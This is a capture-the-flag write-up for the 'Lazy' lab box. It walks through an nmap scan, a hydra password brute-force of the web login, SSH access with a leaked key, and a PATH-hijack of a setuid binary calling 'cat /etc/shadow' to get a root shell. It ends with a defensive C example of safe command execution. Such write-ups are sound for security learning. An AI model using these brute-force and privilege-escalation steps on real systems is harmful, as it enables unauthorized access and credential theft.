Lazy by Coding_Karma {Noob Ways}

We start with a direct nmap scan

nmap -sV -O -A 10.10.10.18

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 13:44 IST
Nmap scan report for 10.10.10.18
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   302.44 ms 10.10.14.1
2   303.53 ms 10.10.10.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.46 seconds

So we can see that port 80 is open. Let's head to the page and try to log in as admin:admin. At this point I saw "admin" being saved and prompted as the username, so I planned to try "hydra"
with this command:
hydra -l admin -P rockyou.txt 10.10.10.18 http-post-form "/login.php:username=^USER^&password=^PASS^&rememberme=on:Invalid credentials"
After a little while we got a result from hydra saying:
"host: 10.10.10.18 login: admin password: p4ssw0rd"
We got inside the admin page, took the key, and now we are left with a username, which can be seen if you notice the heading of the SSH key page, i.e. http://10.10.10.18/mysshkeywithnamemitsos

So once we have the key we need to save it and chmod 600 key.txt, then we ssh to the box using ssh -i key.txt mitsos@10.10.10.18. It's pretty simple to grab user.txt; moving on to root.txt.

The moment I saw the binary named "backup" I ran strings on it:

mitsos@LazyClown:/home$ cd mitsos
mitsos@LazyClown:~$ ls
backup  peda  peda-session-backup.txt  test.py  user.txt
mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab

The moment I saw cat /etc/shadow

I did:
echo "/bin/sh" > cat
chmod +x cat
PATH=.:$PATH backup
and got the root hash.

The padding oracle attack works as well; I actually did that first before coming up with hydra, but Ippsec already did a video on that I think, so I didn't cover that method :slight_smile:
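To make the PATH hijack in the post concrete from the defender's side, here is an added C example (not from the box's backup binary or the original post) that mimics how sh resolves a bare command name for system() and shows the hardened alternative: absolute program path, no shell, fixed environment. The /tmp directory names and the stub scripts are constructed for the demo.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Resolve a bare command name the way sh does for system("cat ..."):
 * walk PATH left to right and return the first executable match.
 * An empty entry means the current directory, which is why a local
 * file named "cat" wins when PATH starts with "." */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen) {
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0) snprintf(out, outlen, "./%s", cmd);
        else snprintf(out, outlen, "%.*s/%s", (int)len, p, cmd);
        if (access(out, X_OK) == 0) return 0;   /* found: caller's PATH decided */
        if (!colon) break;
        p = colon + 1;
    }
    out[0] = '\0';
    return -1;
}

/* Hardened replacement for system("cat /etc/shadow"): absolute program path,
 * no shell, and a fixed environment, so the caller's PATH is never consulted.
 * Returns the child's exit status, or -1 on failure. */
int run_fixed(const char *prog, char *const argv[]) {
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(prog, argv, envp); _exit(127); }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo scaffolding (hypothetical): create a directory holding a tiny
 * executable shell script, to build a constructed PATH layout. */
int make_exec_stub(const char *dir, const char *name, const char *body) {
    char path[512];
    if (mkdir(dir, 0755) < 0 && errno != EEXIST) return -1;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(body, f);
    fclose(f);
    return chmod(path, 0755);
}
```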

Good job. For the other ways to log in to the webapp, check this.